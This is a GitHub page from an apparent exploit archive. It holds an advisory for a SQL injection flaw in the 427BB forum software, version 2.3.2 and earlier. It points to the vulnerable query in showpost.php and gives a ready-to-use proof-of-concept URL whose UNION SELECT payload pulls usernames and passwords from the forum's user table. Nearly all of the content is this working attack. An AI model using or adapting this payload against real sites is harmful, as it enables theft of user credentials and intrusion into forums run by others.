forked from 1979139113/0day-today-exploits
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy path10084.txt
22 lines (17 loc) · 982 Bytes
/
10084.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
427BB Fourtwosevenbb <= 2.3.2 SQL Injection Exploit
===================================================
########################################################################
#Download Script : http://sourceforge.net/projects/fourtwosevenbb/files/
########################################################################
########################################################################
#3rr0r: ./fourtwosevenbb-2.3.2/showpost.php
#
# <?php
#line 119:
#line 120: $res = mysql_query($sql);
# ?>
########################################################################
########################################################################
#PoC : http://server/[path]/showpost.php?ForumID=1&post=[SQL]
# http://server/[path]/showpost.php?ForumID=1&post=1%20union%20select%201,UserName,3,4,5,Password,7%20FROM%20427bb_personal%20WHERE%20ID=1--
########################################################################